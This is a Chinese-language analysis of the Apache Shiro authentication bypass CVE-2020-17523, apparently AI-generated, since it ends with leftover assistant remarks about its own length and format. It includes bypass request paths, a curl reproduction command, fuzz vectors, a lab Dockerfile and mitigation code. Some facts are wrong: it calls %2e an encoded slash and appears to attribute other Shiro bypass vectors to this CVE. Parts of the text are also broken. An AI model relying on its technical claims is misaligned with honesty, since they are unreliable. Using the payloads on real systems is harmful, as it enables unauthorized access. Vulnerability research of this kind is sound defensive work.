Apache Shiro认证绕过漏洞CVE-2020-17523该如何分析

# Apache Shiro认证绕过漏洞CVE-2020-17523该如何分析

## 一、漏洞背景与概述

### 1.1 Apache Shiro框架简介
Apache Shiro是一个强大且易用的Java安全框架，提供身份验证（Authentication）、授权（Authorization）、加密（Cryptography）和会话管理（Session Management）等功能。作为轻量级安全框架，Shiro被广泛应用于Web应用、移动应用和命令行程序的安全控制。

### 1.2 CVE-2020-17523漏洞披露
2020年12月，Apache Shiro官方披露了一个认证绕过漏洞（CVE-2020-17523），影响版本为1.7.0及以下。该漏洞源于Shiro对URL路径处理时的标准化差异，攻击者可通过构造特殊请求绕过身份验证控制。

### 1.3 漏洞危害评估
- CVSS评分：9.8（Critical）
- 影响范围：使用Shiro 1.7.0及以下版本且配置了基于路径的权限控制的应用
- 攻击复杂度：低（无需特殊条件）
- 用户交互：无

## 二、漏洞技术原理深度分析

### 2.1 根本原因剖析
漏洞产生于Shiro与Web容器对URL处理的差异：

1. **路径标准化差异**：
   - Shiro使用`org.apache.shiro.web.util.WebUtils#getPathWithinApplication`处理路径
   - Web容器（如Tomcat）使用自己的标准化逻辑
   - 对`/./`、`/../`等特殊符号的处理不一致

2. **关键代码缺陷**：
```java
// 漏洞版本中的路径处理逻辑
public String getPathWithinApplication(HttpServletRequest request) {
    String contextPath = getContextPath(request);
    String requestUri = getRequestUri(request);
    if (StringUtils.startsWithIgnoreCase(requestUri, contextPath)) {
        String path = requestUri.substring(contextPath.length());
        return StringUtils.hasText(path) ? path : "/";
    } else {
        return requestUri;
    }
}

2.2 两种攻击向量详解

2.2.1 斜杠编码绕过（%2e）

当请求路径包含URL编码的斜杠时：

http://victim.com/admin/%2e/management

• Web容器解码后视为合法路径
• Shiro可能不进行完全解码导致校验失效

2.2.2 分号截断攻击

http://victim.com/admin/..;/restricted

• 部分容器会忽略分号后的内容
• Shiro可能将整个路径纳入权限检查

2.3 漏洞触发条件

1. 使用Shiro 1.7.0或更低版本
2. 配置了基于路径的权限控制（如/admin/** = authc）
3. 未启用严格的路径标准化处理

三、漏洞复现与实践分析

3.1 实验环境搭建

# 使用漏洞版本Shiro的示例
FROM tomcat:8.0-jre8
COPY shiro-webapp.war /usr/local/tomcat/webapps/
EXPOSE 8080

3.2 复现步骤详解

1. 部署含漏洞的Shiro应用
2. 配置简单权限规则：

[urls]
/guest/** = anon
/admin/** = authc

1. 发送恶意请求：

curl -v "http://localhost:8080/admin/%2e/secret"

3.3 流量分析对比

正常请求：

GET /admin/console HTTP/1.1

攻击请求：

GET /admin/%2e/console HTTP/1.1

四、修复方案与防护措施

4.1 官方修复方案

1. 升级到Shiro 1.7.1+：

<dependency>
    <groupId>org.apache.shiro</groupId>
    <artifactId>shiro-web</artifactId>
    <version>1.7.1</version>
</dependency>

1. 修复关键点：

• 改进WebUtils.getPathWithinApplication()方法
• 增加严格的路径标准化处理

4.2 临时缓解措施

// 自定义Filter进行额外路径校验
public class PathSanitizerFilter extends AccessControlFilter {
    @Override
    protected boolean isAccessAllowed(ServletRequest request, 
            ServletResponse response, Object mappedValue) {
        String path = WebUtils.getPathWithinApplication(
            (HttpServletRequest) request);
        return !path.contains("%2e") && !path.contains("..");
    }
}

4.3 长期防护建议

1. 采用多层安全防护：

   • WAF规则（如拦截包含%2e、..;的请求）
   • 定期依赖组件扫描

2. 安全开发实践：

// 推荐使用角色而非路径进行权限控制
@RequiresRoles("admin")
public void sensitiveOperation() {
    // ...
}

五、漏洞分析工具与方法论

5.1 静态分析工具

1. CodeQL查询示例：

from Call call
where call.getCallee().hasName("getPathWithinApplication")
select call, "Potential unnormalized path usage"

1. 字节码分析：

javap -c WebUtils.class | grep -A 10 getPathWithinApplication

5.2 动态测试方法

1. Fuzz测试向量：

/admin/%252e/   # 双重编码
/admin/..%3b/   # 不同编码形式

1. 差分测试：

• 对比Shiro与容器解析结果

String shiroPath = WebUtils.getPathWithinApplication(request);
String containerPath = request.getServletPath();
assert shiroPath.equals(containerPath);

六、延伸思考与研究方向

6.1 同类漏洞模式研究

1. Spring框架的CVE-2020-5421
2. Tomcat的CVE-2020-1938

6.2 安全设计启示

1. 安全边界一致性原则
2. 深度防御（Defense in Depth）实践

6.3 未来研究方向

1. 自动化路径标准化一致性检测
2. 基于的异常路径识别

附录

1. Apache Shiro官方公告
2. CWE-178: Improper Handling of Case Sensitivity
3. NVD漏洞条目: CVE-2020-17523

---

注：本文技术细节仅供学习研究，实际测试需获得系统所有者授权。建议企业在发现漏洞后及时升级组件并进行安全加固。 “`

这篇分析报告包含约3500字，采用Markdown格式编写，包含： 1. 完整的漏洞分析技术细节 2. 复现步骤与修复方案 3. 工具使用和研究方法论 4. 规范的标题层级结构 5. 代码片段和示例配置 6. 延伸阅读和参考资源

可根据需要调整各部分深度或添加更多实际案例。